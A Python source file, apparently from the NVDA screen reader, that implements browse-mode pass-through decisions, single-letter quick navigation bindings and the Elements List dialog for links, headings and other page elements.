controlTypes.Role.TABCONTROL,
controlTypes.Role.MENUBAR,
controlTypes.Role.POPUPMENU,
controlTypes.Role.TREEVIEW,
controlTypes.Role.TREEVIEWITEM,
controlTypes.Role.SPINBUTTON,
controlTypes.Role.TABLEROW,
controlTypes.Role.TABLECELL,
controlTypes.Role.TABLEROWHEADER,
controlTypes.Role.TABLECOLUMNHEADER,
})
SWITCH_TO_PASS_THROUGH_ON_FOCUS_ROLES = frozenset({
controlTypes.Role.LISTITEM,
controlTypes.Role.RADIOBUTTON,
controlTypes.Role.TAB,
controlTypes.Role.MENUITEM,
controlTypes.Role.RADIOMENUITEM,
controlTypes.Role.CHECKMENUITEM,
})
IGNORE_DISABLE_PASS_THROUGH_WHEN_FOCUSED_ROLES = frozenset({
controlTypes.Role.MENUITEM,
controlTypes.Role.RADIOMENUITEM,
controlTypes.Role.CHECKMENUITEM,
controlTypes.Role.TABLECELL,
})
	def shouldPassThrough(self, obj, reason: Optional[OutputReason] = None):
		"""Determine whether pass through mode should be enabled (focus mode) or disabled (browse mode) for a given object.
		@param obj: The object in question.
		@type obj: L{NVDAObjects.NVDAObject}
		@param reason: The reason for this query;
		one of the output reasons, or C{None} for manual pass through mode activation by the user.
		@return: C{True} if pass through mode (focus mode) should be enabled, C{False} if it should be disabled (browse mode).
		@rtype: bool
		"""
		if reason and (
			self.disableAutoPassThrough
			or (reason == OutputReason.FOCUS and not config.conf["virtualBuffers"]["autoPassThroughOnFocusChange"])
			or (reason == OutputReason.CARET and not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"])
		):
			# This check relates to auto pass through and auto pass through is disabled, so don't change the pass through state.
			return self.passThrough
		if reason == OutputReason.QUICKNAV:
			# Quick navigation always lands the user in browse mode.
			return False
		states = obj.states
		role = obj.role
		if controlTypes.State.EDITABLE in states and controlTypes.State.UNAVAILABLE not in states:
			return True
		# Menus sometimes get focus due to menuStart events even though they don't report as focused/focusable.
		if not obj.isFocusable and controlTypes.State.FOCUSED not in states and role != controlTypes.Role.POPUPMENU:
			return False
		# many controls that are read-only should not switch to passThrough.
		# However, there are exceptions.
		if controlTypes.State.READONLY in states:
			# #13221: For Slack message lists, and the MS Edge downloads window, switch to passthrough
			# even though the list item and list are read-only, but focusable.
			if (
				role == controlTypes.Role.LISTITEM and controlTypes.State.FOCUSED in states
				and obj.parent.role == controlTypes.Role.LIST and controlTypes.State.FOCUSABLE in obj.parent.states
			):
				return True
			# Certain controls such as combo boxes and readonly edits are read-only but still interactive.
			# #5118: read-only ARIA grids should also be allowed (focusable table cells, rows and headers).
			if role not in (
				controlTypes.Role.EDITABLETEXT, controlTypes.Role.COMBOBOX, controlTypes.Role.TABLEROW,
				controlTypes.Role.TABLECELL, controlTypes.Role.TABLEROWHEADER, controlTypes.Role.TABLECOLUMNHEADER
			):
				return False
		# Any roles or states for which we always switch to passThrough
		if role in self.ALWAYS_SWITCH_TO_PASS_THROUGH_ROLES or controlTypes.State.EDITABLE in states:
			return True
		# focus is moving to this control. Perhaps after pressing tab or clicking a button that brings up a menu (via javascript)
		if reason == OutputReason.FOCUS:
			if role in self.SWITCH_TO_PASS_THROUGH_ON_FOCUS_ROLES:
				return True
			# If this is a focus change, pass through should be enabled for certain ancestor containers.
			# this is done last for performance considerations. Walking up the through the parents could be costly
			while obj and obj != self.rootNVDAObject:
				if obj.role == controlTypes.Role.TOOLBAR:
					return True
				obj = obj.parent
		return False
	def _get_shouldTrapNonCommandGestures(self):
		# Getter for shouldTrapNonCommandGestures: mirrors the user's
		# "trap non-command gestures" browse mode configuration setting.
		return config.conf['virtualBuffers']['trapNonCommandGestures']
	def script_trapNonCommandGesture(self,gesture):
		# Swallow the gesture, playing the Windows default sound asynchronously
		# (1 == winsound.SND_ASYNC) to indicate the key did nothing.
		winsound.PlaySound("default",1)
singleLetterNavEnabled=True #: Whether single letter navigation scripts should be active (true) or if these letters should fall to the application.
def getAlternativeScript(self,gesture,script):
if self.passThrough or not gesture.isCharacter:
return script
if not self.singleLetterNavEnabled:
return None
if not script and self.shouldTrapNonCommandGestures:
script=self.script_trapNonCommandGesture
return script
def script_toggleSingleLetterNav(self,gesture):
if self.singleLetterNavEnabled:
self.singleLetterNavEnabled=False
# Translators: Reported when single letter navigation in browse mode is turned off.
ui.message(_("Single letter navigation off"))
else:
self.singleLetterNavEnabled=True
# Translators: Reported when single letter navigation in browse mode is turned on.
ui.message(_("Single letter navigation on"))
# Translators: the description for the toggleSingleLetterNavigation command in browse mode.
script_toggleSingleLetterNav.__doc__=_("Toggles single letter navigation on and off. When on, single letter keys in browse mode jump to various kinds of elements on the page. When off, these keys are passed to the application")
def _get_ElementsListDialog(self):
return ElementsListDialog
def _iterNodesByType(self,itemType,direction="next",pos=None):
"""
Yields L{QuickNavItem} objects representing the ordered positions in this document according to the type being searched for (e.g. link, heading, table etc).
@param itemType: the type being searched for (e.g. link, heading, table etc)
@type itemType: string
@param direction: the direction in which to search (next, previous, up)
@type direction: string
@param pos: the position in the document from where to start the search.
@type pos: Usually an L{textInfos.TextInfo}
@raise NotImplementedError: This type is not supported by this BrowseMode implementation
"""
raise NotImplementedError
def _iterNotLinkBlock(self, direction="next", pos=None):
raise NotImplementedError
def _quickNavScript(self,gesture, itemType, direction, errorMessage, readUnit):
if itemType=="notLinkBlock":
iterFactory=self._iterNotLinkBlock
else:
iterFactory=lambda direction,info: self._iterNodesByType(itemType,direction,info)
info=self.selection
try:
item = next(iterFactory(direction, info))
except NotImplementedError:
# Translators: a message when a particular quick nav command is not supported in the current document.
ui.message(_("Not supported in this document"))
return
except StopIteration:
ui.message(errorMessage)
return
# #8831: Report before moving because moving might change the focus, which
# might mutate the document, potentially invalidating info if it is
# offset-based.
if not gesture or not willSayAllResume(gesture):
item.report(readUnit=readUnit)
item.moveTo()
@classmethod
def addQuickNav(
cls,
itemType: str,
key: Optional[str],
nextDoc: str,
nextError: str,
prevDoc: str,
prevError: str,
readUnit: Optional[str] = None
):
"""Adds a script for the given quick nav item.
@param itemType: The type of item, I.E. "heading" "Link" ...
@param key: The quick navigation key to bind to the script.
Shift is automatically added for the previous item gesture. E.G. h for heading.
If C{None} is provided, the script is unbound by default.
@param nextDoc: The command description to bind to the script that yields the next quick nav item.
@param nextError: The error message if there are no more quick nav items of type itemType in this direction.
@param prevDoc: The command description to bind to the script that yields the previous quick nav item.
@param prevError: The error message if there are no more quick nav items of type itemType in this direction.
@param readUnit: The unit (one of the textInfos.UNIT_* constants) to announce when moving to this type of item.
For example, only the line is read when moving to tables to avoid reading a potentially massive table.
If None, the entire item will be announced.
"""
scriptSuffix = itemType[0].upper() + itemType[1:]
scriptName = "next%s" % scriptSuffix
funcName = "script_%s" % scriptName
script = lambda self,gesture: self._quickNavScript(gesture, itemType, "next", nextError, readUnit)
script.__doc__ = nextDoc
script.__name__ = funcName
script.resumeSayAllMode = sayAll.CURSOR.CARET
setattr(cls, funcName, script)
if key is not None:
cls.__gestures["kb:%s" % key] = scriptName
scriptName = "previous%s" % scriptSuffix
funcName = "script_%s" % scriptName
script = lambda self,gesture: self._quickNavScript(gesture, itemType, "previous", prevError, readUnit)
script.__doc__ = prevDoc
script.__name__ = funcName
script.resumeSayAllMode = sayAll.CURSOR.CARET
setattr(cls, funcName, script)
if key is not None:
cls.__gestures["kb:shift+%s" % key] = scriptName
def script_elementsList(self, gesture):
# We need this to be a modal dialog, but it mustn't block this script.
def run():
gui.mainFrame.prePopup()
d = self.ElementsListDialog(self)
d.ShowModal()
d.Destroy()
gui.mainFrame.postPopup()
wx.CallAfter(run)
# Translators: the description for the Elements List command in browse mode.
script_elementsList.__doc__ = _("Lists various types of elements in this document")
script_elementsList.ignoreTreeInterceptorPassThrough = True
def _activateNVDAObject(self, obj):
"""Activate an object in response to a user request.
This should generally perform the default action or click on the object.
@param obj: The object to activate.
@type obj: L{NVDAObjects.NVDAObject}
"""
try:
obj.doAction()
except NotImplementedError:
log.debugWarning("doAction not implemented")
def _activatePosition(self, obj=None):
if not obj:
obj=self.currentNVDAObject
if not obj:
return
if obj.role == controlTypes.Role.MATH:
import mathPres
try:
return mathPres.interactWithMathMl(obj.mathMl)
except (NotImplementedError, LookupError):
pass
return
if self.shouldPassThrough(obj):
obj.setFocus()
self.passThrough = True
reportPassThrough(self)
elif obj.role == controlTypes.Role.EMBEDDEDOBJECT or obj.role in self.APPLICATION_ROLES:
obj.setFocus()
speech.speakObject(obj, reason=OutputReason.FOCUS)
else:
self._activateNVDAObject(obj)
def script_activatePosition(self,gesture):
if config.conf["virtualBuffers"]["autoFocusFocusableElements"]:
self._activatePosition()
else:
self._focusLastFocusableObject(activatePosition=True)
# Translators: the description for the activatePosition script on browseMode documents.
script_activatePosition.__doc__ = _("Activates the current object in the document")
	def _focusLastFocusableObject(self, activatePosition=False):
		"""Used when auto focus focusable elements is disabled to sync the focus
		to the browse mode cursor.
		When auto focus focusable elements is disabled, NVDA doesn't focus elements
		as the user moves the browse mode cursor. However, there are some cases
		where the user always wants to interact with the focus; e.g. if they press
		the applications key to open the context menu. In these cases, this method
		is called first to sync the focus to the browse mode cursor.
		@param activatePosition: if True, also activate the object at the caret
			(which is not necessarily the focusable object) after syncing focus.
		@type activatePosition: bool
		"""
		obj = self.currentFocusableNVDAObject
		# Only move the system focus when it is genuinely out of sync with the caret.
		if obj!=self.rootNVDAObject and self._shouldSetFocusToObj(obj) and obj!= api.getFocusObject():
			obj.setFocus()
			# We might be about to activate or pass through a key which will cause
			# this object to change (e.g. checking a check box). However, we won't
			# actually get the focus event until after the change has occurred.
			# Therefore, we must cache properties for speech before the change occurs.
			speech.speakObject(obj, OutputReason.ONLYCACHE)
			self._objPendingFocusBeforeActivate = obj
		if activatePosition:
			# Make sure we activate the object at the caret, which is not necessarily focusable.
			self._activatePosition()
	def script_passThrough(self,gesture):
		# When auto focus of focusable elements is off, the system focus may lag
		# behind the browse mode caret; sync it before sending the gesture on.
		if not config.conf["virtualBuffers"]["autoFocusFocusableElements"]:
			self._focusLastFocusableObject()
		gesture.send()
	# Translators: the description for the passThrough script on browseMode documents.
	script_passThrough.__doc__ = _("Passes gesture through to the application")
def script_disablePassThrough(self, gesture):
if not self.passThrough or self.disableAutoPassThrough:
return gesture.send()
# #3215 ARIA menus should get the Escape key unconditionally so they can handle it without invoking browse mode first
obj = api.getFocusObject()
if obj and obj.role in self.IGNORE_DISABLE_PASS_THROUGH_WHEN_FOCUSED_ROLES:
return gesture.send()
self.passThrough = False
self.disableAutoPassThrough = False
reportPassThrough(self)
script_disablePassThrough.ignoreTreeInterceptorPassThrough = True
def _set_disableAutoPassThrough(self, state):
# If the user manually switches to focus mode with NVDA+space, that enables
# pass-through and disables auto pass-through. If auto focusing of focusable
# elements is disabled, NVDA won't have synced the focus to the browse mode
# cursor. However, since the user is switching to focus mode, they probably
# want to interact with the focus, so sync the focus here.
if (
state
and not config.conf["virtualBuffers"]["autoFocusFocusableElements"]
and self.passThrough
):
self._focusLastFocusableObject()
self._disableAutoPassThrough = state
def _get_disableAutoPassThrough(self):
return self._disableAutoPassThrough
__gestures={
"kb:NVDA+f7": "elementsList",
"kb:enter": "activatePosition",
"kb:numpadEnter": "activatePosition",
"kb:space": "activatePosition",
"kb:NVDA+shift+space":"toggleSingleLetterNav",
"kb:escape": "disablePassThrough",
"kb:control+enter": "passThrough",
"kb:control+numpadEnter": "passThrough",
"kb:shift+enter": "passThrough",
"kb:shift+numpadEnter": "passThrough",
"kb:control+shift+enter": "passThrough",
"kb:control+shift+numpadEnter": "passThrough",
"kb:alt+enter": "passThrough",
"kb:alt+numpadEnter": "passThrough",
"kb:applications": "passThrough",
"kb:shift+applications": "passThrough",
"kb:shift+f10": "passThrough",
}
# Add quick navigation scripts.
qn = BrowseModeTreeInterceptor.addQuickNav
qn("heading", key="h",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading"))
qn("heading1", key="1",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 1"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 1"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 1"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 1"))
qn("heading2", key="2",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 2"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 2"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 2"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 2"))
qn("heading3", key="3",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 3"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 3"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 3"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 3"))
qn("heading4", key="4",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 4"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 4"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 4"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 4"))
qn("heading5", key="5",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 5"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 5"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 5"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 5"))
qn("heading6", key="6",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 6"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 6"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 6"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 6"))
qn("table", key="t",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next table"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next table"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous table"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous table"),
readUnit=textInfos.UNIT_LINE)
qn("link", key="k",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next link"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next link"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous link"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous link"))
qn("visitedLink", key="v",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next visited link"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next visited link"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous visited link"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous visited link"))
qn("unvisitedLink", key="u",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next unvisited link"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next unvisited link"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous unvisited link"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous unvisited link"))
qn("formField", key="f",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next form field"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next form field"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous form field"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous form field"))
qn("list", key="l",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next list"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next list"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous list"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous list"),
readUnit=textInfos.UNIT_LINE)
qn("listItem", key="i",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next list item"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next list item"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous list item"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous list item"))
qn("button", key="b",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next button"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next button"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous button"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous button"))
qn("edit", key="e",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next edit field"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next edit field"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous edit field"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous edit field"),
readUnit=textInfos.UNIT_LINE)
qn("frame", key="m",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next frame"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next frame"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous frame"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous frame"),
readUnit=textInfos.UNIT_LINE)
qn("separator", key="s",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next separator"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next separator"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous separator"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous separator"))
qn("radioButton", key="r",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next radio button"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next radio button"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous radio button"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous radio button"))
qn("comboBox", key="c",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next combo box"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next combo box"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous combo box"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous combo box"))
qn("checkBox", key="x",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next check box"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next check box"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous check box"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous check box"))
qn("graphic", key="g",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next graphic"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next graphic"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous graphic"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous graphic"))
qn("blockQuote", key="q",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next block quote"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next block quote"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous block quote"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous block quote"))
qn("notLinkBlock", key="n",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("skips forward past a block of links"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no more text after a block of links"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("skips backward past a block of links"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no more text before a block of links"),
readUnit=textInfos.UNIT_LINE)
qn("landmark", key="d",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next landmark"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next landmark"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous landmark"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous landmark"),
readUnit=textInfos.UNIT_LINE)
qn("embeddedObject", key="o",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next embedded object"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next embedded object"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous embedded object"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous embedded object"))
qn("annotation", key="a",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next annotation"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next annotation"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous annotation"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous annotation"))
qn("error", key="w",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next error"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next error"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous error"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous error"))
qn(
"article", key=None,
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next article"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next article"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous article"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous article")
)
qn(
"grouping", key=None,
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next grouping"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next grouping"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous grouping"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous grouping")
)
del qn
class ElementsListDialog(
	DpiScalingHelperMixinWithoutInit,
	gui.contextHelp.ContextHelpMixin,
	wx.Dialog # wxPython does not seem to call base class initializer, put last in MRO
):
	"""A dialog listing elements of a chosen type (links, headings, form fields,
	buttons or landmarks) in a browse mode document, with filtering, and
	buttons to move to or activate the selected element.
	"""
	helpId = "ElementsList"
	# (elementType, localized label) pairs backing the type selection radio box.
	ELEMENT_TYPES = (
		# Translators: The label of a radio button to select the type of element
		# in the browse mode Elements List dialog.
		("link", _("Lin&ks")),
		# Translators: The label of a radio button to select the type of element
		# in the browse mode Elements List dialog.
		("heading", _("&Headings")),
		# Translators: The label of a radio button to select the type of element
		# in the browse mode Elements List dialog.
		("formField", _("&Form fields")),
		# Translators: The label of a radio button to select the type of element
		# in the browse mode Elements List dialog.
		("button", _("&Buttons")),
		# Translators: The label of a radio button to select the type of element
		# in the browse mode Elements List dialog.
		("landmark", _("Lan&dmarks")),
	)
	# A tree entry: the quick nav item plus its parent Element (None at the root).
	Element = collections.namedtuple("Element", ("item", "parent"))
	# Class-level so the last chosen type is preselected next time the dialog opens.
	lastSelectedElementType=0
	def __init__(self, document):
		"""Build the dialog's controls and populate it for the remembered element type.

		@param document: the browse mode document whose elements are listed;
			script_elementsList passes the tree interceptor itself.
		"""
		super().__init__(
			parent=gui.mainFrame,
			# Translators: The title of the browse mode Elements List dialog.
			title=_("Elements List")
		)
		self.document = document
		mainSizer = wx.BoxSizer(wx.VERTICAL)
		contentsSizer = wx.BoxSizer(wx.VERTICAL)
		# Translators: The label of a group of radio buttons to select the type of element
		# in the browse mode Elements List dialog.
		child = wx.RadioBox(self, wx.ID_ANY, label=_("Type:"), choices=tuple(et[1] for et in self.ELEMENT_TYPES))
		child.SetSelection(self.lastSelectedElementType)
		child.Bind(wx.EVT_RADIOBOX, self.onElementTypeChange)
		contentsSizer.Add(child, flag=wx.EXPAND)
		contentsSizer.AddSpacer(gui.guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS)
		self.tree = wx.TreeCtrl(
			self,
			size=self.scaleSize((500, 300)), # height is chosen to ensure the dialog will fit on an 800x600 screen
			style=wx.TR_HAS_BUTTONS | wx.TR_HIDE_ROOT | wx.TR_LINES_AT_ROOT | wx.TR_SINGLE | wx.TR_EDIT_LABELS
		)
		self.tree.Bind(wx.EVT_SET_FOCUS, self.onTreeSetFocus)
		self.tree.Bind(wx.EVT_CHAR, self.onTreeChar)
		self.tree.Bind(wx.EVT_TREE_BEGIN_LABEL_EDIT, self.onTreeLabelEditBegin)
		self.tree.Bind(wx.EVT_TREE_END_LABEL_EDIT, self.onTreeLabelEditEnd)
		# The root is hidden (TR_HIDE_ROOT); all listed elements hang off it.
		self.treeRoot = self.tree.AddRoot("root")
		contentsSizer.Add(self.tree,flag=wx.EXPAND)
		contentsSizer.AddSpacer(gui.guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS)
		# Translators: The label of an editable text field to filter the elements
		# in the browse mode Elements List dialog.
		filterText = _("Filter b&y:")
		labeledCtrl = gui.guiHelper.LabeledControlHelper(self, filterText, wx.TextCtrl)
		self.filterEdit = labeledCtrl.control
		self.filterEdit.Bind(wx.EVT_TEXT, self.onFilterEditTextChange)
		contentsSizer.Add(labeledCtrl.sizer)
		contentsSizer.AddSpacer(gui.guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS)
		bHelper = gui.guiHelper.ButtonHelper(wx.HORIZONTAL)
		# Translators: The label of a button to activate an element in the browse mode Elements List dialog.
		# Beware not to set an accelerator that would collide with other controls in this dialog, such as an
		# element type radio label.
		self.activateButton = bHelper.addButton(self, label=_("Activate"))
		self.activateButton.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(True))
		# Translators: The label of a button to move to an element
		# in the browse mode Elements List dialog.
		self.moveButton = bHelper.addButton(self, label=_("&Move to"))
		self.moveButton.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(False))
		bHelper.addButton(self, id=wx.ID_CANCEL)
		contentsSizer.Add(bHelper.sizer, flag=wx.ALIGN_RIGHT)
		mainSizer.Add(contentsSizer, border=gui.guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL)
		mainSizer.Fit(self)
		self.SetSizer(mainSizer)
		self.tree.SetFocus()
		# Populate the tree for the remembered (or default) element type.
		self.initElementType(self.ELEMENT_TYPES[self.lastSelectedElementType][0])
		self.CentreOnScreen()
def onElementTypeChange(self, evt):
elementType=evt.GetInt()
# We need to make sure this gets executed after the focus event.
# Otherwise, NVDA doesn't seem to get the event.
queueHandler.queueFunction(queueHandler.eventQueue, self.initElementType, self.ELEMENT_TYPES[elementType][0])
self.lastSelectedElementType=elementType
	def initElementType(self, elType):
		"""(Re)build self._elements for the given element type and reset filtering.

		Also enables/disables the Activate button depending on whether the type
		can be activated, and remembers the element nearest the caret
		(self._initialElement) as the initial selection.
		"""
		if elType in ("link","button"):
			# Links and buttons can be activated.
			self.activateButton.Enable()
			self.SetAffirmativeId(self.activateButton.GetId())
		else:
			# No other element type can be activated.
			self.activateButton.Disable()
			self.SetAffirmativeId(self.moveButton.GetId())
		# Gather the elements of this type.
		self._elements = []
		self._initialElement = None
		# Stack of candidate ancestors for the element currently being processed.
		parentElements = []
		isAfterSelection=False
		for item in self.document._iterNodesByType(elType):
			# Find the parent element, if any.
			for parent in reversed(parentElements):
				if item.isChild(parent.item):
					break
				else:
					# We're not a child of this parent, so this parent has no more children and can be removed from the stack.
					parentElements.pop()
			else:
				# No parent found, so we're at the root.
				# Note that parentElements will be empty at this point, as all parents are no longer relevant and have thus been removed from the stack.
				parent = None
			element=self.Element(item,parent)
			self._elements.append(element)
			if not isAfterSelection:
				isAfterSelection=item.isAfterSelection
				if not isAfterSelection:
					# The element immediately preceding or overlapping the caret should be the initially selected element.
					# Since we have not yet passed the selection, use this as the initial element.
					try:
						self._initialElement = self._elements[-1]
					except IndexError:
						# No previous element.
						pass
			# This could be the parent of a subsequent element, so add it to the parents stack.
			parentElements.append(element)
		# Start with no filtering.
		self.filterEdit.ChangeValue("")
		self.filter("", newElementType=True)
def filter(self, filterText, newElementType=False):
# If this is a new element type, use the element nearest the cursor.
# Otherwise, use the currently selected element.
# #8753: wxPython 4 returns "invalid tree item" when the tree view is empty, so use initial element if appropriate.
try:
defaultElement = self._initialElement if newElementType else self.tree.GetItemData(self.tree.GetSelection())
except:
defaultElement = self._initialElement
# Clear the tree.
self.tree.DeleteChildren(self.treeRoot)
# Populate the tree with elements matching the filter text.
elementsToTreeItems = {}
defaultItem = None
matched = False
#Do case-insensitive matching by lowering both filterText and each element's text.
filterText=filterText.lower()
for element in self._elements:
label=element.item.label
if filterText and filterText not in label.lower():
continue
matched = True
parent = element.parent
if parent:
parent = elementsToTreeItems.get(parent)
item = self.tree.AppendItem(parent or self.treeRoot, label)
self.tree.SetItemData(item, element)
elementsToTreeItems[element] = item
if element == defaultElement:
defaultItem = item
self.tree.ExpandAll()
if not matched:
# No items, so disable the buttons.
self.activateButton.Disable()
self.moveButton.Disable()
return
# If there's no default item, use the first item in the tree.
self.tree.SelectItem(defaultItem or self.tree.GetFirstChild(self.treeRoot)[0])
# Enable the button(s).
# If the activate button isn't the default button, it is disabled for this element type and shouldn't be enabled here.
if self.AffirmativeId == self.activateButton.Id:
self.activateButton.Enable()
self.moveButton.Enable()
	def onTreeSetFocus(self, evt):
		# Reset incremental-search state whenever the tree gains focus.
		# Start with no search.
		self._searchText = ""
		self._searchCallLater = None
		evt.Skip()
